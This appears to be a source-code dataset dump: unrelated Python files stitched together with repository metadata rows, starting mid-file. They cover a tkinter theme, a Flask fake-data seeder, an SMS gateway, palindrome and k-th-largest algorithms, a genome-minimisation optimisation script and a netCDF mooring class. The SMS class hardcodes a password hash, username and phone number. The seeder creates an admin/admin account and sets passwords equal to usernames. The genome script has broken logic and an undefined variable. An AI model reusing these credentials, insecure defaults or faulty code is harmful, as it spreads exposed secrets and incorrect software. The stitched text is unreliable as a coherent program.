"troughcolor": colours['bg_level_2'],
"bordercolor": colours['bg_level_2']
}
},
"Vertical.TScrollbar": {
"configure": {
"background": colours['bg_level_3'],
"foreground": colours['fg_level_3'],
"highlightcolor": colours['fg_level_3'],
"troughcolor": colours['bg_level_2'],
"bordercolor": colours['bg_level_2']
}
},
"HelpDialog.TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"Link.TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['link_colour']
}
},
"HelpDialog.TFrame": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"KeyboardGroup.TFrame": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['bg_level_2'],
"padding": 10
}
},
"TButton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['fg_level_2']
},
"map": {
"background": [('active', colours['bg_level_3'])],
"relief": [('pressed', 'sunken')]
}
},
"TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"TMenuButton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['bg_level_2']
}
},
"TPanedWindow": {
"configure": {
"background": colours['bg_level_3'],
"foreground": colours['fg_level_3']
}
},
"Canvas.TFrame": {
"configure": {
"background": colours['bg_level_0'],
"foreground": colours['fg_level_0']
}
},
"ButtonPanel.TFrame": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"Preview.TFrame": {
"configure": {
"borderwidth": 3,
"relief": "groove"
}
}
}
style = ttk.Style()
style.theme_create("light_theme", "clam", settings=settings)
| 34.055085
| 73
| 0.393679
|
4aa0146947a7e097243416a89dfd3270d7fb67d1
| 3,226
|
py
|
Python
|
fake-data.py
|
zack-klein/multi-tenant-sqlalchemy
|
99c512be840d99706c32223eeb89b5113615179e
|
[
"MIT"
] | 3
|
2020-12-21T21:09:05.000Z
|
2021-02-01T06:10:06.000Z
|
fake-data.py
|
zack-klein/multi-tenant-sqlalchemy
|
99c512be840d99706c32223eeb89b5113615179e
|
[
"MIT"
] | null | null | null |
fake-data.py
|
zack-klein/multi-tenant-sqlalchemy
|
99c512be840d99706c32223eeb89b5113615179e
|
[
"MIT"
] | null | null | null |
from faker import Faker
from flask import current_app
from flask_appbuilder.security.sqla.models import Role, User
from random import choice, randint
from tqdm import tqdm
from werkzeug.security import generate_password_hash
from app import app
from app.database import db
from app.models import Post, Tenant
def add_user(username, firstname, lastname, email, role, password, tenant_id):
user = User()
user.first_name = firstname
user.last_name = lastname
user.password = generate_password_hash(password)
user.username = username
user.email = email
user.active = True
user.roles.append(role)
user.current_tenant_id = tenant_id
return user
def create_fake_data(
num_tenants, num_posts, max_users_per_tenant, min_users_per_tenant,
):
fake = Faker()
db.drop_all()
db.create_all()
current_app.appbuilder.sm.create_db()
current_app.appbuilder.add_permissions(update_perms=True)
current_app.appbuilder.sm.create_db()
# Users & Tenants
# Create an admin first
admin_role = db.session.query(Role).filter(Role.name == "Admin").first()
admin = add_user(
"admin", "admin", "admin", "admin", admin_role, "admin", None
)
users = [admin]
used_usernames = []
tenants = []
public_role = db.session.query(Role).filter(Role.name == "Public").first()
print("Creating tenants...")
for _ in tqdm(range(0, num_tenants)):
this_tenant_users = []
tenant = Tenant(name=fake.company() + " " + fake.job().title() + "s")
this_tenant_users_num = randint(
min_users_per_tenant, max_users_per_tenant
)
# Create users
for _ in range(this_tenant_users_num):
firstname = fake.first_name()
lastname = fake.last_name()
username = f"{firstname}.{lastname}".lower()
email = f"{username}@{fake.word()}.com"
password = username
if username not in used_usernames:
user = add_user(
username,
firstname,
lastname,
email,
public_role,
password,
None,
)
used_usernames.append(username)
this_tenant_users.append(user)
users.append(user)
# Add users for this tenant
this_tenant_users.append(admin)
tenant.users = this_tenant_users
tenants.append(tenant)
db.session.add_all(users)
db.session.commit()
db.session.add_all(tenants)
db.session.commit()
posts = []
for _ in tqdm(range(0, num_posts)):
tenant = choice(tenants)
user = choice(tenant.users)
post = Post(
name=f"{fake.bs()} {fake.word()}".title(),
text="\n\n".join(fake.paragraphs()),
tenant_id=tenant.id,
author_id=user.id,
)
posts.append(post)
db.session.add_all(posts)
db.session.commit()
print("All done!")
with app.app_context():
create_fake_data(
num_tenants=5,
num_posts=1000,
max_users_per_tenant=12,
min_users_per_tenant=2,
)
| 27.109244
| 78
| 0.606634
|
91dc94682bac3b8f91c5b96f6b1f4d3f8e57186e
| 611
|
py
|
Python
|
smsapigateway.py
|
tivisse/yogame
|
a6de2789febf43958ed48bcf4c35f81900262b7a
|
[
"BSD-2-Clause"
] | 2
|
2016-03-22T13:36:22.000Z
|
2016-03-22T13:37:17.000Z
|
smsapigateway.py
|
tivisse/yogame
|
a6de2789febf43958ed48bcf4c35f81900262b7a
|
[
"BSD-2-Clause"
] | null | null | null |
smsapigateway.py
|
tivisse/yogame
|
a6de2789febf43958ed48bcf4c35f81900262b7a
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import urllib2
from urlparse import urlparse
from urllib import quote
class SMSAPIGateway(object):
PASS_MD5 = '85d9ee56e9927912119fbc89de2eb22e'
USERNAME = 'username'
URL = 'https://ssl.smsapi.pl/sms.do?'
TO = '0032471071323'
def send(self, msg):
url = '%susername=%s&password=%s&message=%s&to=%s&eco=1&encoding=utf-8' % \
(self.URL, self.USERNAME, self.PASS_MD5, msg, self.TO)
url = quote(url, safe='/:?&=')
try:
print urllib2.urlopen(url).read()
except Exception, e:
print e
if __name__ == "__main__":
SMSAPIGateway().send('Alerte SMS')
| 26.565217
| 78
| 0.657938
|
e81f8b1a30832ba7c4ae67bcadc94a48a22c8d68
| 2,531
|
py
|
Python
|
Algo and DSA/LeetCode-Solutions-master/Python/shortest-palindrome.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 3,269
|
2018-10-12T01:29:40.000Z
|
2022-03-31T17:58:41.000Z
|
Algo and DSA/LeetCode-Solutions-master/Python/shortest-palindrome.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 53
|
2018-12-16T22:54:20.000Z
|
2022-02-25T08:31:20.000Z
|
Algo and DSA/LeetCode-Solutions-master/Python/shortest-palindrome.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 1,236
|
2018-10-12T02:51:40.000Z
|
2022-03-30T13:30:37.000Z
|
# Time: O(n)
# Space: O(n)
# optimized from Solution2
class Solution(object):
def shortestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
def getPrefix(pattern):
prefix = [-1] * len(pattern)
j = -1
for i in xrange(1, len(pattern)):
while j > -1 and pattern[j+1] != pattern[i]:
j = prefix[j]
if pattern[j+1] == pattern[i]:
j += 1
prefix[i] = j
return prefix
if not s:
return s
A = s + '#' + s[::-1]
return s[getPrefix(A)[-1]+1:][::-1] + s
# Time: O(n)
# Space: O(n)
class Solution2(object):
def shortestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
def getPrefix(pattern):
prefix = [-1] * len(pattern)
j = -1
for i in xrange(1, len(pattern)):
while j > -1 and pattern[j+1] != pattern[i]:
j = prefix[j]
if pattern[j+1] == pattern[i]:
j += 1
prefix[i] = j
return prefix
if not s:
return s
A = s + s[::-1]
prefix = getPrefix(A)
i = prefix[-1]
while i >= len(s):
i = prefix[i]
return s[i+1:][::-1] + s
# Time: O(n)
# Space: O(n)
# Manacher's Algorithm
class Solution3(object):
def shortestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
def preProcess(s):
if not s:
return ['^', '$']
string = ['^']
for c in s:
string += ['#', c]
string += ['#', '$']
return string
string = preProcess(s)
palindrome = [0] * len(string)
center, right = 0, 0
for i in xrange(1, len(string) - 1):
i_mirror = 2 * center - i
if right > i:
palindrome[i] = min(right - i, palindrome[i_mirror])
else:
palindrome[i] = 0
while string[i + 1 + palindrome[i]] == string[i - 1 - palindrome[i]]:
palindrome[i] += 1
if i + palindrome[i] > right:
center, right = i, i + palindrome[i]
max_len = 0
for i in xrange(1, len(string) - 1):
if i - palindrome[i] == 1:
max_len = palindrome[i]
return s[len(s)-1:max_len-1:-1] + s
| 25.565657
| 81
| 0.41288
|
22160d7ba65bccacf6f5e8eb006a656428d9d199
| 937
|
py
|
Python
|
tests/nn/pipe_process/__init__.py
|
aurickq/fairscale
|
909c84462c6c53abcc4c2841d14a9496e6a3e033
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1,662
|
2020-07-15T21:40:19.000Z
|
2022-03-31T10:45:12.000Z
|
tests/nn/pipe_process/__init__.py
|
aurickq/fairscale
|
909c84462c6c53abcc4c2841d14a9496e6a3e033
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 648
|
2020-07-21T19:00:32.000Z
|
2022-03-30T23:11:41.000Z
|
tests/nn/pipe_process/__init__.py
|
aurickq/fairscale
|
909c84462c6c53abcc4c2841d14a9496e6a3e033
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 170
|
2020-07-16T00:28:01.000Z
|
2022-03-15T19:39:21.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
# Copyright 2019 Kakao Brain
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# tests/__init__.py makes pytest can import the application without custom sys.path or PYTHONPATH.
# See also: https://docs.pytest.org/en/latest/goodpractices.html
| 42.590909
| 98
| 0.769477
|
6897ea66bbd379f8199ee09c53bd780db61ebc95
| 321
|
py
|
Python
|
atlas/__init__.py
|
animesh/atlas
|
7c744f9ccaaa0ebf2845b4331969b2fff82575e3
|
[
"BSD-3-Clause"
] | null | null | null |
atlas/__init__.py
|
animesh/atlas
|
7c744f9ccaaa0ebf2845b4331969b2fff82575e3
|
[
"BSD-3-Clause"
] | null | null | null |
atlas/__init__.py
|
animesh/atlas
|
7c744f9ccaaa0ebf2845b4331969b2fff82575e3
|
[
"BSD-3-Clause"
] | null | null | null |
__version__ = "2.6a2"
from .scripts import utils
TAX_LEVELS = ["superkingdom", "phylum", "class", "order", "family", "genus", "species"]
BLAST6 = [
"qseqid",
"sseqid",
"pident",
"length",
"mismatch",
"gapopen",
"qstart",
"qend",
"sstart",
"send",
"evalue",
"bitscore",
]
| 16.05
| 87
| 0.535826
|
e0f7d634c64a75ddd28ac0bcc1edcb79c8c25f7a
| 961
|
py
|
Python
|
algopro/k_biggest_elem.py
|
Mifour/Algorithms
|
77cfafc49bc0130da0f6041b169a15053f81af87
|
[
"MIT"
] | null | null | null |
algopro/k_biggest_elem.py
|
Mifour/Algorithms
|
77cfafc49bc0130da0f6041b169a15053f81af87
|
[
"MIT"
] | null | null | null |
algopro/k_biggest_elem.py
|
Mifour/Algorithms
|
77cfafc49bc0130da0f6041b169a15053f81af87
|
[
"MIT"
] | null | null | null |
import heapq
import random
"""
Soution from AlgoPro
"""
def findKthLargest(nums, k):
return sorted(nums)[len(nums) - k]
def findKthLargest2(nums, k):
return heapq.nlargest(k, nums)[-1]
def findKthLargest3(nums, k):
def select(list, l, r, index):
if l == r:
return list[l]
pivot_index = random.randint(l, r)
# move pivot to the beginning of list
list[l], list[pivot_index] = list[pivot_index], list[l]
# partition
i = l
for j in range(l + 1, r + 1):
if list[j] < list[l]:
i += 1
list[i], list[j] = list[j], list[i]
# move pivot to the correct location
list[i], list[l] = list[l], list[i]
# recursively partition one side
if index == i:
return list[i]
elif index < i:
return select(list, l, i - 1, index)
else:
return select(list, i + 1, r, index)
return select(nums, 0, len(nums) - 1, len(nums) - k)
print(findKthLargest3([3, 5, 2, 4, 6, 8], 3))
# 5
| 23.439024
| 59
| 0.58897
|
429729dc4c2cad61907c2bb12ddf7a643ddd8222
| 19,073
|
py
|
Python
|
util/minGenome.py
|
Spherotob/iJL208
|
3a0e878963f46742cc9c973327dd24028f67a4d3
|
[
"MIT"
] | 4
|
2020-12-07T04:32:34.000Z
|
2021-07-20T17:42:49.000Z
|
util/minGenome.py
|
Spherotob/iJL208
|
3a0e878963f46742cc9c973327dd24028f67a4d3
|
[
"MIT"
] | null | null | null |
util/minGenome.py
|
Spherotob/iJL208
|
3a0e878963f46742cc9c973327dd24028f67a4d3
|
[
"MIT"
] | 1
|
2021-01-15T13:26:00.000Z
|
2021-01-15T13:26:00.000Z
|
###########################
### SOLVING FOR iJL208 ###
###########################
import json
import pandas as pd
import pulp
import itertools
import pdb
import re
import os
from tqdm import tqdm
def build_MIP_by_Cobrapy(model, growth_rate, essential_genes_file, parameters_file, regulator_genes_file, TU_Json_file, out_path='../data/minGenome', verbose=False, solver='CPLEX', iterations=10):
M = 1000
#Change variable names to comply former names
me = model
mu = growth_rate
eg_f = essential_genes_file
parameters_f = parameters_file
reg_f = regulator_genes_file
############# sets ################################
# TU
with open(TU_Json_file) as data_file:
TUs = json.load(data_file)
# essential genes
essential_genes = pd.read_csv(eg_f,index_col=0)
essential_genes['gene'] = "u_G_" + essential_genes['gene'].astype(str)
essential_genes = essential_genes['gene'].tolist()
# regulator genes
if reg_f != None:
reg_genes = pd.read_csv(reg_f,index_col=0)
reg_genes['gene'] = "u_G_" + reg_genes['gene'].astype(str)
reg_genes = reg_genes['gene'].tolist()
# ############# parameters ################################
df = pd.read_csv(parameters_f,index_col=0)
test_all_genes = df["gene_or_promoter"].tolist()
not_shared = []
for gene in TUs.keys():
if gene not in test_all_genes:
not_shared.append(gene)
df["gene_or_promoter"] = "u_G_" + df["gene_or_promoter"].astype(str)
no_start = df[df['cannot_as_start']==1]["gene_or_promoter"].tolist()
genes = df["gene_or_promoter"].tolist()
end = df[['gene_or_promoter','start']].set_index('gene_or_promoter')\
.T.to_dict('list')
start = df[['gene_or_promoter','start_if_select_as_start']]\
.set_index('gene_or_promoter').T.to_dict('list')
reactions = [r_id.id for r_id in me.reactions]
metabolites = [m_id.id for m_id in me.metabolites]
############# variables ################################
v = pulp.LpVariable.dicts("v", reactions, 0, M, cat='Continuous')
x = pulp.LpVariable.dicts("x", genes, cat='Binary')
y = pulp.LpVariable.dicts("y", genes, cat='Binary')
z = pulp.LpVariable.dicts("z", genes, cat='Binary')
# z can be defined as continuous
############# define model ################################
lp_prob = pulp.LpProblem("MaxDeletion", pulp.LpMaximize)
############# objective ################################
lp_prob += (pulp.lpSum([y[j]*end[j][0] for j in genes])
- pulp.lpSum([x[j]*start[j][0] for j in genes])), "Max_length"
def addReactionIndicator(lp_prob):
for r in me.reactions:
rgenes = r.genes
GPR = r.gene_reaction_rule
GPR = GPR.replace('\n','')
GPR = GPR.replace('__10__','')
if 's0001' in GPR: continue # not mapped gene in iJO1366
if 'BG12900' in GPR: continue # not mapped gene in iYO844
# pdb.set_trace()
# no genes
if len(rgenes) == 0:
continue
# single gene
# if ('and' and 'AND' and 'or' and 'OR') not in GPR:
if 'and' not in GPR \
and 'AND' not in GPR \
and 'or' not in GPR \
and 'OR' not in GPR:
# print GPR, genes
assert(len(rgenes) == 1)
for gene in rgenes:
gene = gene.id.replace('__10__','')
label = "knockout" + str(gene)
gene = "u_G_" + gene
lp_prob += v[r.id] - (1-z[gene])*M <= 0, \
label + "_UB_" + r.id
lp_prob += v[r.id] - (1-z[gene])*(-M) >= 0, \
label + "_LB_" + r.id
# enzyme complex
elif (('and' or 'AND') in GPR) and (('or' or 'OR') not in GPR):
# print genes
# print GPR
assert(len(rgenes) > 1)
for gene in rgenes:
gene = gene.id.replace('__10__','').replace('(','').replace(')','')
label = "knockout_" + str(gene)
gene = "u_G_" + gene
lp_prob += v[r.id] - (1-z[gene])*M <= 0, \
label + "_UB_" + r.id
lp_prob += v[r.id] - (1-z[gene])*(-M) >= 0, \
label + "_LB" + r.id
# isozymes
elif (('and' or 'AND') not in GPR) and (('or' or 'OR') in GPR):
# print GPR
lp_prob += v[r.id] - M <= 0, "knockout" + r.id + "Ori_UB"
lp_prob += v[r.id] - (-M) >= 0, "knockout" + r.id + "Ori_LB"
assert(len(rgenes) > 1)
lp_prob += v[r.id] - M * pulp.lpSum(1-z['u_G_'+j.id.replace('__10__','')] \
for j in rgenes) <=0, "knockout" + r.id + '_UB'
lp_prob += v[r.id] - (-M) * pulp.lpSum(1-z['u_G_'+j.id.replace('__10__','')] \
for j in rgenes) >=0, "knockout" + r.id + '_LB'
# more complicated GPRs
else:
# print r.id
# print GPR.split(' or ')
proteins = [protein.replace("( ","").replace(" )","").split(' and ')\
for protein in GPR.split(' or ')]
all_proteins = []
for protein in proteins:
mini = []
for prot in protein:
mini.append(prot.replace('(','').replace(')',''))
all_proteins.append(mini)
proteins = all_proteins
commonGenes = set(proteins[0])
# if len(gpr.proteins) > 1:
for protein in proteins[1:]:
commonGenes.intersection_update(protein)
nonCommonGenesList = []
for protein in proteins:
nonCommonGenes = []
for gene in protein:
if gene not in commonGenes:
nonCommonGenes.append(gene)
nonCommonGenesList.append(nonCommonGenes)
for gene in commonGenes:
# gene = gene.id
label = "knockout" + str(gene)
gene = "u_G_" + gene.replace('__10__','').replace('(','').replace(')','')
lp_prob += v[r.id] - (1-z[gene])*M <= 0, \
label + "_UB_" + r.id
lp_prob += v[r.id] - (1-z[gene])*(-M) >= 0, \
label + "_LB_" + r.id
allCombination = list(itertools.product(*nonCommonGenesList))
# print allCombination
# print allCombination
for i,genesC in enumerate(allCombination):
lp_prob += v[r.id] - M * pulp.lpSum(1-z['u_G_'+j.replace('__10__','')] \
for j in genesC) <=0,\
"knockout" + r.id + '_UB_' + str(i)
lp_prob += v[r.id] - (-M) * pulp.lpSum(1-z['u_G_'+j.replace('__10__','')] \
for j in genesC) >=0,\
"knockout" + r.id + '_LB_' + str(i)
############# constraints ################################
if verbose:
print("add reaction indicator")
addReactionIndicator(lp_prob)
def get_S(model,mu):
"""build the stoichiometric matrix at a specific growth rate"""
# intialize to 0
# S = dok_matrix((len(self.metabolites), len(self.reactions)))
S = {}
# populate with stoichiometry
for i, r in enumerate(model.reactions):
for met, value in r._metabolites.items():
#met_index = self.metabolites.index(met)
if met.id not in S:
S[met.id] = {}
if hasattr(value, "subs"):
S[met.id][r.id] = float(value.subs(mu, growth_rate))
else:
S[met.id][r.id] = float(value)
return S
#### M-model constraints
S = get_S(me, mu) # growth rate is 0.3
# print S
if verbose:
print("add GSM constraint")
# for i in metabolites:
for i in S.keys():
label = "mass_balance_%s"%i
dot_S_v = pulp.lpSum([S[i][j] * v[j] for j in S[i].keys()])
condition = dot_S_v == 0
lp_prob += condition, label
###### cut in the genome
if verbose:
print("add cutting constraints")
lp_prob += pulp.lpSum(y[j] for j in genes) == 1, "end"
lp_prob += pulp.lpSum(x[j] for j in genes) == 1, "start"
# cut genes between start and end
# for i,gene in enumerate(genes):
# lp_prob += pulp.lpSum(x[j] for j in \
# genes[0:i+1]) - pulp.lpSum(y[j] \
# for j in genes[0:i+1]) - z[gene] == 0,\
# 'indicator' + str(gene)
# A = pulp.LpAffineExpression()
# for i,gene in enumerate(genes):
# A.addterm(x[gene],1) #pulp.lpSum(x[j] for j in genes[0:i+1])
# A.addterm(y[gene],-1)
# lp_prob += A - z[gene] == 0,'indicator' + str(gene)
lp_prob += x[genes[0]] - y[genes[0]] == z[genes[0]], 'indicator' + str(genes[0])
for i,gene in enumerate(genes):
if i == 0: continue
lp_prob += z[genes[i-1]] + x[gene] - y[gene] == z[gene],'indicator' + str(gene)
##### TUs
if verbose:
print("add TU constraint")
for gene,promoters in TUs.items():
if gene in not_shared: continue
gene = 'u_G_' + gene
len_pro = len(promoters)
#print(gene, promoters)
lp_prob += z[gene] - pulp.lpSum(z['u_G_'+j] for j in promoters) + \
(len_pro - 1) >= 0,'TU_all_'+gene
for pro in promoters:
pro = 'u_G_' + pro
lp_prob += z[gene] - z[pro] <=0, 'TU_'+gene+'_'+pro
##### some overlapped region cannot be selected as the start of deletion
if verbose:
print("add no start and essential genes")
for gene in no_start:
lp_prob += x[gene] == 0, 'no_start_'+gene
# knock out transcription of cutted genes
for gene in genes:
label = "knockout" + str(gene)
# pdb.set_trace()
if gene in v.keys():
lp_prob += v[gene] - (1-z[gene])*M <= 0, label
##### add essential genes that cannot be deleted
for eg in essential_genes:
if eg in genes:
lp_prob += z[eg] == 0
##### add regulation genes that cannot be deleted
if reg_f != None:
for eg in reg_genes:
# remove the part joint with essential genes
if (eg in genes) and (eg not in essential_genes):
lp_prob += z[eg] == 0
##### reaction bounds
for r in me.reactions:
# (lb,up) = me.bounds[r_id]
v[r.id].lowBound = r.lower_bound
v[r.id].upBound = r.upper_bound
v['BIOMASS_step3_c'].lowBound = mu
v['BIOMASS'].lowBound = 0
v['BIOMASS'].upBound = 0
v['BIOMASS_step1_c'].lowBound = 0
v['BIOMASS_step1_c'].upBound = 0
v['BIOMASS_step2_c'].lowBound = 0
v['BIOMASS_step2_c'].upBound = 0
# lp file is somtime too larget to write
# lp_prob.writeLP(lpfilename)
# orignial implementation in the paper was calling cplex from C++ directly
# call eternal compled cpp excutable to solve is a better option
# it is implemented in codebase/mingenome_ecoli.cpp
# current test version of using python to call the optimization
# options = [epgap, epagap, epint, epopt, eprhs]
if solver == 'gurobi':
GUROBI_CMD_OPTIONS = [('Threads', 8), ('TimeLimit', 1800), ('FeasibilityTol',1E-9),
('OptimalityTol',1E-9),('IntFeasTol',1E-9),
('MIPGapAbs', 0), ('MIPGap', 0), ('CliqueCuts', 2)]
pulp_solver = pulp.solvers.GUROBI_CMD(path=None, keepFiles=0, mip=1, msg=0,
options=GUROBI_CMD_OPTIONS)
elif solver == 'CPLEX':
pulp_solver = pulp.solvers.CPLEX(path=None, keepFiles=0, mip=1,\
msg=1, options=['mip tolerances mipgap 0', \
'mip tolerances absmipgap 0', 'mip tolerances integrality 0',\
'simplex tolerances optimality 1E-9',\
'simplex tolerances feasibility 1E-9',], timelimit=1200)
elif solver == 'GLPK':
pulp_solver = pulp.solvers.GLPK(path=None, keepFiles=0, mip=1,\
msg=1, options=['mip tolerances mipgap 0', \
'mip tolerances absmipgap 0', 'mip tolerances integrality 0',\
'simplex tolerances optimality 1E-9',\
'simplex tolerances feasibility 1E-9',])
else:
raise ValueError('Solver name not compatible')
x_list = []
y_list = []
status = []
def iterate_solve(lp_prob,iter_count):
lp_prob.solve(pulp_solver)
if verbose:
print("----------- " + str(iter_count) + " ------------")
status.append(pulp.LpStatus[lp_prob.status])
if verbose:
print("Status:", pulp.LpStatus[lp_prob.status])
for v in lp_prob.variables():
if "x_u_G_" in v.name and v.varValue == 1:
xname = v.name.replace("x_","")
xname = xname.replace('_','-')
xname = xname.replace("PM-","PM_")
xname = xname.replace('u-','u_')
xname = xname.replace('G-','G_')
#print(xname,v.name)
lp_prob += x[xname] == 1
if xname not in x_list:
x_list.append(xname)
if "y_u_G_" in v.name and v.varValue == 1:
yname = v.name.replace("y_","")
yname = yname.replace('_','-')
yname = yname.replace("PM-","PM_")
yname = yname.replace('u-','u_')
yname = yname.replace('G-','G_')
lp_prob += y[yname] == 1
if yname not in y_list:
y_list.append(yname)
rhs = iter_count + 1
lp_prob.constraints['start'].changeRHS(rhs)
lp_prob.constraints['end'].changeRHS(rhs)
return lp_prob
for iter_count in range(1,iterations):
#Updates the lp_prob at each iteration
lp_prob = iterate_solve(lp_prob,iter_count)
#Write the final results
out_file = 'deletion_results_' + str(iteration-1) + '.csv'
writing_path = os.path.join(out_path, out_file)
pd.DataFrame({'start': x_list, 'end':y_list, 'status':status}).to_csv(writing_path)
#### analyze result
def get_all_deletions(result_df, genes_and_promoters):
#Get the start and end location, and the span of them
all_deletions = []
for i, row in result_df.iterrows():
start_element = row['start'].replace('u_G_','')
end_element = row['end'].replace('u_G_','')
#Find start and end in genome
for j, line in genes_and_promoters.iterrows():
if start_element == line['gene_or_promoter']:
start = line['start']
if end_element == line['gene_or_promoter']:
end = line['end']
all_deletions.append((start,end, abs(start-end)))
deletions_loc = pd.DataFrame.from_records(all_deletions, columns=['start_loc','end_loc','length'])
return all_deletions
def get_genes_in_results(all_deletions, genes_and_promoters):
#Get all the genes in the results
deleted_genes = []
for t in all_deletions:
# '+' strand deletion
if t[1] - t[0] > 0:
start = t[0]
end = t[1]
# '-' strand deletions
elif t[1] - t[0] < 0:
start = t[1]
end = t[0]
#Find the genes within those boundaries
deleted_genes.append([g for g in genes_and_promoters['gene_or_promoter'][(genes_and_promoters['start'] > start)\
& (genes_and_promoters['end'] < end)\
& (genes_and_promoters['class'] == 'genes')]])
all_deleted_genes = []
for l in deleted_genes:
for g in l:
all_deleted_genes.append(g)
return list(set(all_deleted_genes))
def calculate_mcc(all_deleted_genes, comparison_syn3):
from math import sqrt
def get_confusion_matrix(all_deleted_genes, new_baby_sheet):
#Make the comparisons now
#Number of deleted genes absent from syn3.0 (true positives)
true_positives = set(all_deleted_genes).intersection(set(new_baby_sheet['locus_tag'][new_baby_sheet['syn3.0'] == 'thrash'].to_list()))
#Number of deleted genes that are in syn3.0 (false positives)
false_positives = set(all_deleted_genes).intersection(set(new_baby_sheet['locus_tag'][new_baby_sheet['syn3.0'] == 'keep'].to_list()))
#Number of non-deleted genes that are in syn3.0 (true negatives)
all_florum_genes = set(new_baby_sheet['locus_tag'].to_list())
non_deleted_genes = all_florum_genes.difference(set(all_deleted_genes))
true_negatives = non_deleted_genes.intersection(set(new_baby_sheet['locus_tag'][new_baby_sheet['syn3.0']=='keep'].to_list()))
#Number of non-deleted genes that are missing in syn3.0 (false negatives)
false_negatives = non_deleted_genes.intersection(set(new_baby_sheet['locus_tag'][new_baby_sheet['syn3.0']=='thrash']))
return len(true_positives), len(false_positives), len(true_negatives), len(false_negatives)
tp, fp, tn, fn = get_confusion_matrix(all_deleted_genes, comparison_syn3)
num = float((tp*tn)-(fp*fn))
denom = float(sqrt((tp+fp)*(tp+fn)*(tn+fp)*(tn+fn)))
mcc = num/denom
return mcc
def get_deletion_results(max_deletion_df, genes_and_promoters, comparison_syn3):
all_deletion_results, old_all_deleted_genes = [], []
all_deletions = get_all_deletions(max_deletion_df, genes_and_promoters)
for i in tqdm(range(len(max_deletion_df))):
result_df = max_deletion_df.iloc[:i,:]
if result_df.empty:
pass
else:
new_all_deleted_genes = get_genes_in_results(all_deletions[:i], genes_and_promoters)
deleted_genes_in_deletion = list(set(new_all_deleted_genes).difference(set(old_all_deleted_genes)))
old_all_deleted_genes = new_all_deleted_genes
mcc = calculate_mcc(old_all_deleted_genes, comparison_syn3)
# Generate the deletions results for this iteration
all_deletion_results.append((len(old_all_deleted_genes),
deleted_genes_in_deletion,
sum([t[2] for t in all_deletions[:i]]),
mcc))
return all_deletion_results
| 42.764574
| 196
| 0.531275
|
1e85a2c32a4b035641275ebdb0f9d2fbe58b6e99
| 499
|
py
|
Python
|
p3.py
|
geetharamson/problemset-pands
|
16fff4c8feea674232c03d96881196c866318e93
|
[
"Apache-2.0"
] | null | null | null |
p3.py
|
geetharamson/problemset-pands
|
16fff4c8feea674232c03d96881196c866318e93
|
[
"Apache-2.0"
] | null | null | null |
p3.py
|
geetharamson/problemset-pands
|
16fff4c8feea674232c03d96881196c866318e93
|
[
"Apache-2.0"
] | null | null | null |
# Geetha Karthikesan ,2019
# divisors.py
#program to output nos between 1000 & 10000 divisible by 6 not 12
# Using for loop to set n is the no ranging from 1000 to 10000
for n in range (1000, 10000):
# checking if the no is completely divisible by 6 and not divisible by 12 based on their remainders
if n % 6 ==0 and n % 12 != 0 :
# print n
print (n)
# increment the value of n by 1
n=n+1
# Reference
# https://www.geeksforgeeks.org
# python tutorial
| 29.352941
| 103
| 0.653307
|
f83f3eeff2925906fb987a4084595eed43f740ed
| 2,786
|
py
|
Python
|
python_roms_modules/emooring.py
|
NoeLahaye/InTideScat_JGR
|
6849e82b3cda816ca7bdc6ab207e2c857a3f5f5f
|
[
"CC0-1.0"
] | null | null | null |
python_roms_modules/emooring.py
|
NoeLahaye/InTideScat_JGR
|
6849e82b3cda816ca7bdc6ab207e2c857a3f5f5f
|
[
"CC0-1.0"
] | null | null | null |
python_roms_modules/emooring.py
|
NoeLahaye/InTideScat_JGR
|
6849e82b3cda816ca7bdc6ab207e2c857a3f5f5f
|
[
"CC0-1.0"
] | null | null | null |
from netCDF4 import Dataset
import numpy as np
class emooring(object):
""" class containing all variables from a virtual mooring taken from a simulation
copy variables data ("ndplusArray" instance objects) and some meta_informations """
def __init__(self,ncfile,itmin=None,itmax=None):
nc = Dataset(ncfile,'r')
ncvar = nc.variables
if itmin is None:
try:
itmin = np.where(ncvar['time'][:].mask==False)[0][0]
except:
itmin = 0
if itmax is None:
try:
itmax = np.where(ncvar['time'][:].mask==False)[0][-1] + 1
except:
itmax = nc.dimensions['time'].size
# copy variables
self.variables = {}
for nam, val in ncvar.items():
if 'time' in val.dimensions:# and val.ndim>1:
inds = tuple([slice(itmin,itmax)]+[slice(0,ind) for ind in val.shape[1:]])
setattr(self,nam,ndplusArray(val,inds))
elif 'time' not in val.dimensions:
setattr(self,nam,ndplusArray(val))
self.variables[nam] = getattr(self,nam)
# copy attributes (and create some)
for att in ["hcoord_section","simul","date_beg","date_end"]:
if att in nc.ncattrs():
setattr(self,att,nc.getncattr(att))
self.nt = itmax - itmin
self.nx = nc.dimensions['xi_rho'].size
self.ny = nc.dimensions['eta_rho'].size
nc.close()
